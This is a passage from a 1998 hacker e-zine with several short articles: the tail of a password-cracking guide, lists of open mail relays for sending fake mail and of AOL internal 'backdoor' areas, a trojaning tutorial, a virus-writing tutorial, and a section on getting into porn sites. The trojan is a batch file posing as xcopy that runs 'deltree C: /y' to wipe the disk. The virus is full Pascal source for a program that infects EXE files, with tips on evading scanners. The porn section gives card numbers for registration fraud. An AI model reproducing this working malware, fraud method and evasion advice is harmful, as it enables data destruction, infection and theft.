listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no b
(notice the c) if you don't know what this means it means the password
file is shadowed and you cannot work out the passwords for a shadowed
password file then you're in bad luck, I would recommend trying the ftp
hack prior to this for the best results.
If some but not all logins have a * in them then it's ok, it's worth while
getting the ones which aren't shadowed, hey a shell is a shell!!!
If you want to use your newly acquired shells then telnet to the site and
put in the login and the password (remember you have to crack the password
file first explained at the top).
Anyway that's it for now hope at least some people benefited from this guide.
Please send Comments, Questions, and Death threats to. But please no
mailbombs i feel so sorry for you when i have to fry your asses...
Acidmeister@hotmail.com
Or visit him at.
http://www.hackersweb.com
For the ultimate list of hacking guides and toolz of the trade.
Or you can find him on
Chat.yahoo.com as AcidMeister the one and only
Disclaimer:
This is for Educational purposes only it should not be used as a guide to
cause havoc or to hack. He He He, good luck!!! And don't get caught. I
would hate to see you in a cell with your 300 pound Bruno The Gay Ax
murderer. He He He
Thanx to Samantha and BliNdfire.
Copyright AcidMeister...
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
11. Some Relaying-Server
by the file ripper
tfr@gmx.net
March 23, 1998
You know this !? You want to send a fake mail (a anonymous mail), but
you don't know a relaying server !? here are some...
Note : Don't forget ... telnet in with port 25 !! or use them in your
anonymous mail sender...
128.236.1.1
128.236.8.2
128.236.8.3
128.236.8.4
128.248.100.50
130.127.200.5
146.126.86.241
155.229.6.2
192.41.21.66
192.41.3.129
192.41.3.130
192.80.63.129
192.9.25.1
192.9.9.1
194.198.118.11
198.161.98.129
199.170.121.4
199.2.194.14
199.222.42.2
204.124.208.102
204.134.8.1
204.174.16.1
204.201.231.46
204.94.125.125
205.138.99.197
205.214.51.15
206.72.10.199
agora.rdrop.com
Aspen.CO.US.StarLink.Org
babylon.beyondirc.net
blacklodge.c2.org
blackmagic.sorcery.net
Cinci.OH.US.StarLink.Org
Cleveland.OH.US.Starlink-IRC.Org
communications.com
conexis.es
cvo.oneworld.com
cyberpass.net
davis.DAL.net
davis.oz.org
deathstar.sorcery.net
demonspawn.inna.net <-- GhostHawk's 1st choice
dhp.com
dreamon.com
elux3.cs.umass.edu
fruit.com
gulf.com
harborside.com
hidden.net
hkstar.com
host.net
idt.net
ime.net
interlink-bbs.com
irc.anet-chi.com
irc.aohell.org
irc.badgerden.com
irc.beachin.net
irc.dal.net
irc.havenet.com
irc.io-online.com
irc.liii.com
irc.limited.net
irc.localhost.net
irc.localnet.com
irc.mwweb.com
irc.oglobo.com.br
irc.tech.uh.edu
irc.thor.net
irc.tscnet.com
irc.xtatix.com
irc2.inficad.com
jeflin.tju.edu
lightning.mgl.ca
lords.com
LosAngeles.CA.US.ChatNet.Org
Losangeles.ca.us.Kidsworld.org
lycaeum.org
mail.acilink.org
mail.sojourn.com <-- the file ripper's 1st choice
mail.tds.net
mail.utexas.edu
mailmasher.com
malasada.lava.net
mind.com
mindijari.DAL.net
monsoon.com
nccn.net
neato.ca.us.another.net
netacc.net
netvision.net
nexus.flash.net
northernnet.com
nymserver.com
ocean.us.austnet.org
Philadelphia.PA.US.Ultranet.Org
post1.com
postoffice.com
pt.cyanamid.com
relay.net
remail.obscura.com
remailer.nl.com
rigel.cyberpass.net
russia.com
sandiego.ca.us.undernet.org
scorpion.latech.edu
scsnet.com
seidata.com
server.com
SF.CA.US.Chatnet.Org
sos.net
southernco.com
space.net
sprynet.com
StrathRoy.ON.CA.Cobra.Net
sunrise.ca.us.another.net
telephone.com
ucinet.com
vader.institute.wnyric.org
viphosting.com
vivanet.com
voyager.DAL.net
WalnutCreek.CA.US.ChatNet.Org
webfire.tx.us.icenet.org
webmaster.us.austnet.org
www.acc.af.mil
www.iowa.net
www.montana.net
www.netforward.com
xs4all.nl
have phun!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
12. AOL-Gateways
by AcidMeister
warming@vol.com
aol://4344:1186.Gateway.3685343.498065448
Guide Rainman:
aol://4344:1186.guide.3682978.488405094
Guide Conf Room:
aol://4344:1186.ConfRms.3685342.498065107
Guide Libaries:
aol://4344:1186.ResLib.3685341.498053484
ARC:
aol://4344:666.arcform.860809.504463074
Community Center:
aol://4344:1186.comcen.3683158.490570698
Rainman Cmds:
aol://4344:1.rmc.70682.473023645
S&S Policy:
aol://4344:223.pnp.91463.482279948
Special Acnts:
aol://4344:223.specacct.89721.481584812
Search Stuff
aol://4344:204.z66proj2.1845884.505890733
OH account
aol://4344:20.oh1te.92384.497065962
About Special Affinity/Account Groups
aol://4344:223.affingrp.89731.481585326
CNN
aol://4344:223.cnn.89754.481594657
DEMO Accounts
aol://4344:223.demo.89755.481594657
Special Account Descriptions
aol://4344:223.specacct.89721.481584812
April Promo Codes
aol://4344:223.aprilpr.96692.512240264
Promotion Codes
aol://4344:223.promocd.6558384.500850050
Marketing Info
aol://4344:223.markting.6558102.500754022
Did You Know???
aol://4344:223.helpdocs.84876.494254534
Guide Program
aol://4344:1186.guide.3682978.488405094
Conference Room Backdoors
aol://4344:243.mainconf.5964915.500442609
Info on The Americaonline Service
aol://4344:666.userinfo.860961.505079464
Host/IP list
aol://4344:204.rslists.67146.468717561
Visual Publisher for WIndows
aol://4344:1.vis_pubw.72126.491927210
Vogel Verlag
aol://2719:3-524
TV Today Chat
aol://2719:3-602
Legal Pad
aol://2719:3-599
In The Soup
aol://2719:3-600
Index by Forum Name
aol://4344:204.cdinf.79776.495161900
Canadian Software
aol://4344:223.canad2.6602532.512279521
Examine Object Information
aol://4344:204.examine1.71162.473812954
VLA Adam's Private Area
aol://4344:204.a37area.6616266.517541277
VirtuaLeader Academy's VirtuaLab
aol://4344:204.vlalab$$.68347.469068066
Search America Online (Everywhere)
aol://4344:683.vlasrch.6164889.505527591
VLA Private Area Backlink
aol://4344:204.vlapage.6567454.503558406
Top Secrets
aol://4344:409.secrets.6553845.498835541
In the Sand - XXX
aol://4344:613.sand.3475361.491812962
Computing Channel Internet
aol://4344:1454.comp_cha.3407965.483568458
WebRequest
aol://1391:40-31999
AOL pointers newstand
aol://4344:559.newslet.4129994.494194276
Forms:
aol://4344:1.formscat.71914.474386750
TLA app
aol://4344:20.tlaapp1.125506.492637725
Shower Scene
aol://4344:613.shower.3475360.491812517
AOL 1.5 - Access
aol://4344:226.llIl.2755674.520114429
Security code: 3675
Boo Boo Pic
oob oob
AOL - Nutzer
100000
Changes Color of Chat Room
color
Secret Area
TYGER
In the Sand
20.aol://4344:613.sand.3475361.491812962
Shaggy Pic
yggahs
Yogi Pic
igoy
AOL Resource Center Message Boards
aol://5863:126/mB:51014
APPLY TO BE A BETA TESTER
aol://1722:beta%20apply
Remote Staff Lounge
aol://4344:1165.stafflng.3349013.515879444
Josie Pic
eisoj
Papa Smurf Pic
frumsapap
Secret Staff Access
aol://1722:gstaff
Nipples Aweigh
aol://4344:773.HOTNIP1.6843825.521317437
Entertainment Promo
aol://4344:754.entspot.6684982.499022815
Barney is a Nazi
aol://4344:1165.barney.3353269.522706580
Programming Area
Teenz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
13. Trojaning
by the file ripper
tfr@gmx.net
May 30, 1998
What is trojaning ?
Remember the story with the city trojan ?
The greeks couldn't defeat the trojans, so they used a trick.
The greeks gave the trojans a present. A wooden horse and the
belly was hollow. In the empty belly the put in the best warrios.
The silly trojans take the horse into their city and they celebrate
the victory. After all trojans are drunken the warrios came out,
and so they defeated finally the trojans ... by the way : The horse
was later on called the "trojan horse"...
In the Computerworld it's exactly the same. A *evil* program is hidden
in an helpful programm.
For what is trojaning used ??
Let's see ... ;) I just told you the greeks defeated with this trojan
horse the trojans ... now what do you think for what are this little
programmz used ?? For gaining access ... Let's say you give a trojan
to an sysadmin and he runs the programm from his admin-account, so the
programm is able to access more things than you as a normal user.
Let's say you want to change the password of the admin ... with a
trojan you can make it! The only problem is, that trojaning (mostly) only
works in systems like Novell or Win/Dos/Unix-based systems.
How do I trojan a system ??
In Dos (=Disk owning system ;) you can easily make a trojan by using
script files. In Dos script files are called Batch. It's like you give
in commands in the Dos, but you don't have to type every single command
in... oh yeah ... the extention for Batchfiles is .BAT
example :
if you type in in DOS :
DIR
then something like this appears (sorry all in german;) :
Datentrger in Laufwerk D: TFR
Seriennummer des Datentrgers: 1234-1234
Verzeichnis von T:\TFR\TFR
. <DIR> 05-30-98 1:31a .
.. <DIR> 05-30-98 1:31a ..
1 TXT 40,545 05-30-98 1:31a 1.txt
BATCH BAT 3,459 05-30-98 1:31a batch.bat
3 TXT 1,231,230 05-30-98 1:31a a.txt
3 Datei(en) 1,274,134 Bytes
2 Verzeichnis(se) 110,562,366,976 Bytes frei
that means :
BATCH BAT 3,459 05-30-98 1:31a bAtCh.BaT
| | | | | |
| | | | | |- Win95 Name
| | | | |- Creation time
| | | |- Creation date
| | |-Filesize (=3 KB and 459 bytes ...)
| |-Extention
|-First Name ;)
if you want to run this file, just type in BATCH <enter>
(note : don't type in <Enter> ;)
Ok, now I show you how I programmed my first trojan :
first change into the system-dir by typing in "cd <dir>".
In MS-Dos systems the system-dir is noramlly C:\dos\, in
windows-based systems c:\windows\command\
then start the editor by typing in "edit xcopy.bat"
ok, now type in the following commands (note : don't write the
things marked with ";")
@echo off ;hide all commands
copy %1 %2 ;do the helpful part
deltree C: /y ;kill C:, every file ...
That's it. Oh yeah. Now exit the editor and enter the following command :
"del xcopy.exe". Ok, now you installed the trojan. When someone is now
running xcopy it will work correctly, but after he reboots the system is
empty...;)
I used this little programm on a computersystem with more
than 20 computers ... every single computer was killed ;)
If the system is compress with Drivespace or Doublespace it's easier.
Just type change "deltree C: /y" to "deltree h: /Y" ...
In Drivespace/Doublespace the real partition is saved on the Drive H:
If you work on C:, before you start a file the file will be decompressed
from drive H:. If you delete H: (note : msdos won't let you format this
drive!) all is away ... even the partition is away ;). That means not
even the best recovery programm can recover the programmz...
That was one of the easy ways. On every system, there is a big diffrence
how to trojan it.
I don't want to show you more of my trojans because I noticed if I write
many possiblities the dudes reading it, get lazy and only copy my trojans.
And I think you should be able to write your own. There are no limits.
You can use about every program to make it. I programmed some in Pascal.
Not because it's fast or something like this. But I programmed about 4
years in Pascal and I'm able to make about every programm in it ;)... so
I like this language best. C++ is also great, but I hadn't enough time
latly to check out all commands... But if you want to programm really
professional Trojans use Assembler (ASM) it's the only real programming
language! Only to activate your brain : In Novell you can change your
password by typing in a command - I cann't remember well, but I think
it was "setpass <oldpassword> <newpassword>" (or something like this).
Hope you got now some new ideas and show the admins who rules ;)
Some words :
- If you mail me, please write short messages. I mostly have not much
time and if I get a message that is short I can answer more message
in the same time! Oh yeah, if you don't get a message soon, don't
get mad, if you don't receive a reply message within 2 weeks mail me
again! (tfr@gmx.net)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
14. Programming Virii
by the file ripper
tfr@gmx.net
May 30, 1998
Before I start talking about programming Virii, what is an Virus ?
(Note : Virii is the pluralform from Virus ;)
And virus is an program, that repoduce itselfs by copying his code
onto a normal file, so the virus can spread hisself over the whole
harddisk. Normally this causes problems. In many cases the Virus
has also some evil functions implanted, like formating the harddisk
on the 1st of April or some other jokes. To become a good virus programm
you need to know well Assembler. If I talk about programming Virii, I don't
mean getting a virus-creation set and saying the computer what the virus
should do and the creation set will do all the programming work for you...
that's really lame. These Virus are easier to detect, then a elephant in
a house made of glass ;). But there are also some tricks to make your virus
undetectable by any Virusscanner, they keyword is "polymorph", that means
everytime the virus infects a new file, his code changes, the virus
programms itselfs new... (one of the difficult ways). But over the time
I found a way how to make even Virii like Jerusalem.Standard undetectable,
but I will describe this later on in my text.
First, choose the programming language you know best.
In my case it's Pascal (language between Basic and C++)
The second step, is thinking of how the Virus repoduce itselfs. There
are many possiblities. The easiest one is "overwritting", that means
everytime the virus infects the file, the virus replaces all the code of
the programm with itselfs. But this is very conspicuous, so the some
programmer developed some other methode like adding ... (means, that
the virus don't changes anything on the Programm, the Programm is runable,
evertime the programm is started the virus is loaded in the Memory and
infects every programm, that the user run.). But this one is also
a bit conspicuous, because the filesize changes. Again some programmers
had a better idea. Normally in FAT16 (MSDOS) every file you create needs
from the beginning 16KB - 32KB (because of the blocks). That means if you
created a file and only type in 1 single letter, you waste about 16-32KB.
And Virii use this slack (it's called like this) for there code. There
are even Virii out there, that do "steahling". That means if they are in
memory not even virusscanners are able to detect them. Even if you do
"dir" and the virus is in memory the filesize hasn't change. But if the
virus is not in the memory mostly the filesize has changed, so this is
also one of the complicated variants, because you need much informations
about MSDOS systems and how the work (vectors,interrupts...).
In my case I take the easiest on ... Overwritting.
Ok. The next step is programming ;)
-- BEGIN of VIRUS.PAS --
{$M 8192,0,0}
USES Dos;
VAR Command : STRING[79];
R:STRING;
PROCEDURE Infect;
VAR A,F:FILE;
NumRead, NumWritten: Word;
Buf: array[1..2048] of Char;
BEGIN
Assign(F,Command+'.EXE');
{$I-}
Reset(F,1); {check if file exists}
{$I+}
IF IoResult=0 THEN
BEGIN
ReWrite(F,1); {overwrite file, which just started}
Assign(A, Paramstr(0));
Reset(A,1); {filepointer=0, where the virus is saved}
REPEAT {copy the code}
BlockRead(A, Buf, SizeOf(Buf), NumRead);
BlockWrite(F, Buf, NumRead, NumWritten);
UNTIL (NumRead = 0) OR (NumWritten <> NumRead);
Close(A);
Close(F);
END;
END;
BEGIN {MAIN Procedure}
REPEAT
GetDir(0,R);
Write(r,'>'); {write the dir}
Readln(Command);
IF Command<>'' THEN
BEGIN
SwapVectors;
Exec(GetEnv('COMSPEC'), '/C '+Command);
SwapVectors;
Infect; {Infect the file}
IF DosError <> 0 THEN
Writeln('Could not execute COMMAND.COM');
END;
Writeln;
UNTIL 1=2; {endless loop}
END.
-- END of VIRUS.PAS --
Yeah, I only built in the important informations. Normally you can also
build in some things like after 10 commands it writes "fuck you" or formats
your harddisk, and stuff like this. But VIRUS.PAS is harmless, after it
was started it is resistent (it creats a new dos-shell) and every file
that is started, which is an exe-file will get infected.
You only have to compile VIRUS.PAS with the pascal-compiler (tpc),
after that the file should have a size of exactly 4,460 KBytes. But
the Virus is a bit big. You can make the file smaller by using Pklite.
PkLite also can be used to make normal Virii, that are detectable by nearly
every Virusscanner, undetectable. Because many Virusscaner search for
special strings in the Virus-code, you can make the Virus undetectable
by compressing it with programms like PkLite or some File-Protection Programz.
That's it ... I hope you enjoyed the text, if you liked it, write
me some comments to : tfr@gmx.net -thanx-.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
15. XXX/Porno
by the file ripper
tfr@gmx.net
May 30, 1998
Because I get every day many mails, only asking for XXX passwords, I
decided to add this little section to this magazine.
First of all ... I know many are ONLY interessted in stuff like this, they
learn hacking ONLY for gaining access to XXX/Porno, but this guys are
LAMERZ. Hacking is for gaining informations, not for sexual arouse!!!
PLEASE DON'T MAIL ME IF THIS TECHNIQUE WRITTEN HERE DON'T WORKS!
I DON'T GIVE ANY SUPPORT ON THIS CRAP!
There are 3 possiblities.
* Here are some free sites :
http://www.freeporn.com
http://www.hardporn.com
(you don't even have to tell your creditcardnumber...no age verification!)
every week new pix
* XXX/Porno archive :
http://www.knoflach.com/sex
username : sex
password : sex
about 1,6 Gb of pictures, videos...
the server is only up, when a friend of mine is online, so try
often. I think he normally goes online about 0900 pm GMT.
* Hacking ;)
I don't called it hacking, but it's something like that ;).
First get a CreditCard (CC) generator. You can download one at
ftp.uha1.com/pub/credit/creditw.zip
or if you need fast some numbers here are some :
Discover Card : 6011 0078 8614 3428
Mastercard : 5318 8459 3741 8709
Visa : 4013 345 617 301
American Express : 3047 000672 87662
Note : The first 4 digits are the bank id number.
Visa numbers can have 13 or 16 digits.
Discover Card - numbers have to begin with 60110.
Ok. Now go to the Registration Page of that sucking Porno Page and
register yourself. Don't use your real name. Be creative and invent
and Name that sounds like it's real ;). Fill out all informations,
you also have to fill out the CreditCard information (note : don't
use the number standing on your own CreditCard ;). Some old servers
don't check if the creditcard is valid, they check if the creditcard
is valid build ... that means they ONLY check if the creditcard is
looking like a real one. That's it. Normally the Software tells you
that you can know login with username and password you entered before
or some shit like that.
Ok, I hope you awesome guys are now lucky!
I only wrote this text about it, because I get many request on that
and I'm not interessted in writting crap like this every day!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
If you think you are good enough than you can join UHA1, for this
email us : uha1@gmx.net.
Also look onto http://www.uha1.com into the join-section!
We are also interessted in alliances with other Hacking Groups.
Greetings to my br0's at gHF and all members (more than 120!) of UHA1.
Remember : you can rule the world only by knowing the key.
-=[ United Hacker Association 1 ]=-
Email : uha1@gmx.net
Homepage : http://www.uha1.com (after the uha there is a ONE!)
ICQ UIN : #7010064 (the file ripper) or #7500553 (Controlio)
************************************ EOF ************************************